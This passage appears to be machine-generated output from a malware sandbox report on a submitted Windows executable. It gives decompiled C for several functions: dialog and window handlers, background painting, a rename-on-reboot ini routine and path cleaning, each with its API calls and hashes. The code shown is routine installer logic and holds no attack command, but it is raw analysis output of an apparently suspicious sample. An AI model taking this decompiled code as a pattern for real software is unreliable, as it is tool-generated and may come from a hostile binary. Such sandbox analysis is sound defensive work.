                  • EnableMenuItem.USER32 ref: 00403C5D
                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
                  • lstrlenA.KERNEL32(00420498,?,00420498,004236A0), ref: 00403CB1
                  • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                  • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                  • String ID:
                  • API String ID: 184305955-0
                  • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                  • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                  • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                  • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403F7F Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}


















                  0x00403f8f
                  0x004040b5
                  0x00404111
                  0x00404115
                  0x004041ec
                  0x004041ee
                  0x004041ee
                  0x004041f4
                  0x004041f4
                  0x004041f7
                  0x00000000
                  0x004041fe
                  0x00404123
                  0x00404125
                  0x0040412f
                  0x0040413a
                  0x0040413d
                  0x00404140
                  0x0040414b
                  0x0040414e
                  0x00404155
                  0x00404163
                  0x0040417b
                  0x00404183
                  0x0040418e
                  0x0040419e
                  0x004041a0
                  0x004041a0
                  0x00404155
                  0x004041aa
                  0x00000000
                  0x004041b5
                  0x004041b9
                  0x004041ca
                  0x004041ca
                  0x004041d0
                  0x004041de
                  0x004041de
                  0x00000000
                  0x004041e2
                  0x004041aa
                  0x004040c0
                  0x00000000
                  0x004040d4
                  0x004040d4
                  0x004040da
                  0x004040da
                  0x004040e0
                  0x00000000
                  0x00000000
                  0x00404105
                  0x00404107
                  0x0040410c
                  0x00000000
                  0x0040410c
                  0x004040c0
                  0x00403f95
                  0x00403f98
                  0x00403f9d
                  0x00403fae
                  0x00403fae
                  0x00403fb5
                  0x00403fb8
                  0x00403fba
                  0x00403fbf
                  0x00403fc8
                  0x00403fce
                  0x00403fda
                  0x00403fdd
                  0x00403fe6
                  0x00403feb
                  0x00403fee
                  0x00403ff3
                  0x0040400a
                  0x00404011
                  0x00404024
                  0x00404027
                  0x0040403c
                  0x00404043
                  0x00404048
                  0x0040404d
                  0x0040404d
                  0x0040405c
                  0x0040406b
                  0x0040406d
                  0x00404083
                  0x00404092
                  0x00404094
                  0x00000000

                  APIs
                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040400A
                  • GetDlgItem.USER32 ref: 0040401E
                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
                  • GetSysColor.USER32(?), ref: 0040404D
                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
                  • lstrlenA.KERNEL32(?), ref: 00404075
                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
                  • GetDlgItem.USER32 ref: 004040F5
                  • SendMessageA.USER32(00000000), ref: 004040F8
                  • GetDlgItem.USER32 ref: 00404123
                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
                  • LoadCursorA.USER32 ref: 00404172
                  • SetCursor.USER32(00000000), ref: 0040417B
                  • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
                  • LoadCursorA.USER32 ref: 0040419B
                  • SetCursor.USER32(00000000), ref: 0040419E
                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                  • String ID: @.B$N$open
                  • API String ID: 3615053054-3815657624
                  • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                  • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                  • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                  • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                  0x0040100a
                  0x00401039
                  0x00401047
                  0x0040104d
                  0x00401051
                  0x0040105b
                  0x00401061
                  0x00401064
                  0x004010f3
                  0x00401089
                  0x0040108c
                  0x004010a6
                  0x004010bd
                  0x004010cc
                  0x004010cf
                  0x004010d5
                  0x004010d9
                  0x004010e4
                  0x004010ed
                  0x004010ef
                  0x004010ef
                  0x00401100
                  0x00401105
                  0x0040110d
                  0x00401110
                  0x00401112
                  0x00401118
                  0x0040111f
                  0x00401126
                  0x00401130
                  0x00401142
                  0x00401156
                  0x00401160
                  0x00401165
                  0x00401165
                  0x00401110
                  0x0040116e
                  0x00000000
                  0x00401178
                  0x00401010
                  0x00401013
                  0x00401015
                  0x0040101f
                  0x0040101f
                  0x00000000

                  APIs
                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                  • BeginPaint.USER32(?,?), ref: 00401047
                  • GetClientRect.USER32 ref: 0040105B
                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                  • FillRect.USER32 ref: 004010E4
                  • DeleteObject.GDI32(?), ref: 004010ED
                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                  • SelectObject.GDI32(00000000,?), ref: 00401140
                  • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                  • DeleteObject.GDI32(?), ref: 00401165
                  • EndPaint.USER32(?,?), ref: 0040116E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                  • String ID: F
                  • API String ID: 941294808-1304234792
                  • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                  • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                  • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                  • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004057D3 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                  0x004057d9
                  0x004057e0
                  0x004057e4
                  0x004057ed
                  0x004057f1
                  0x00405930
                  0x00405930
                  0x00000000
                  0x00405930
                  0x004057f1
                  0x004057fd
                  0x00405813
                  0x0040583b
                  0x00405846
                  0x0040584a
                  0x0040586a
                  0x00405871
                  0x0040587b
                  0x00405888
                  0x0040588d
                  0x00405892
                  0x00405896
                  0x00000000
                  0x00000000
                  0x004058a5
                  0x004058a7
                  0x004058b4
                  0x004058b8
                  0x00405929
                  0x0040592a
                  0x00000000
                  0x004058d4
                  0x004058e1
                  0x00405946
                  0x0040594d
                  0x004058f4
                  0x004058f4
                  0x004058f6
                  0x004058ff
                  0x0040590a
                  0x0040591c
                  0x00405923
                  0x00000000
                  0x00405923
                  0x0040594f
                  0x00405950
                  0x00405955
                  0x00405957
                  0x00405964
                  0x00405964
                  0x00405968
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405959
                  0x00405959
                  0x0040595c
                  0x0040595f
                  0x00405960
                  0x00000000
                  0x00405959
                  0x004058ec
                  0x004058f1
                  0x00000000
                  0x004058f1
                  0x004058b8
                  0x00405815
                  0x00405820
                  0x00405829
                  0x0040582d
                  0x00000000
                  0x00000000
                  0x0040582d
                  0x0040593a

                  APIs
                    • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                    • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                    • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                  • GetShortPathNameA.KERNEL32 ref: 00405829
                  • GetShortPathNameA.KERNEL32 ref: 00405846
                  • wsprintfA.USER32 ref: 00405864
                  • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                  • GlobalFree.KERNEL32 ref: 00405923
                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                    • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                    • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                  • String ID: %s=%s$(&B$[Rename]
                  • API String ID: 3772915668-1834469719
                  • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                  • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                  • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                  • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405CE3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                  0x00405ce5
                  0x00405ced
                  0x00405d01
                  0x00405d01
                  0x00405d07
                  0x00405d14
                  0x00405d14
                  0x00405d15
                  0x00405d17
                  0x00405d1b
                  0x00405d1d
                  0x00405d26
                  0x00405d28
                  0x00405d42
                  0x00405d4a
                  0x00405d4a
                  0x00405d4f
                  0x00405d51
                  0x00405d53
                  0x00405d57
                  0x00405d58
                  0x00405d5b
                  0x00405d63
                  0x00405d65
                  0x00405d69
                  0x00000000
                  0x00000000
                  0x00405d6f
                  0x00405d74
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405d74
                  0x00405d79

                  APIs
                  • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                  • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                  • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                  • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Char$Next$Prev
                  • String ID: "C:\Users\user\Desktop\kVijllv0Yl.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                  • API String ID: 589700163-1661435704
                  • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                  • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                  • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                  • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403E9E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                  0x00403eb0
                  0x00403f44
                  0x00000000
                  0x00403f44
                  0x00403ec1
                  0x00403ec5
                  0x00000000
                  0x00000000
                  0x00403ecb
                  0x00403ed4
                  0x00403ed7
                  0x00403ed7
                  0x00403edd
                  0x00403ee3
                  0x00403ee3
                  0x00403eef
                  0x00403ef5
                  0x00403efc
                  0x00403eff
                  0x00403f02
                  0x00403f04
                  0x00403f04
                  0x00403f0c
                  0x00403f12
                  0x00403f12
                  0x00403f1c
                  0x00403f21
                  0x00403f24
                  0x00403f29
                  0x00403f2c
                  0x00403f2c
                  0x00403f3c
                  0x00403f3c
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
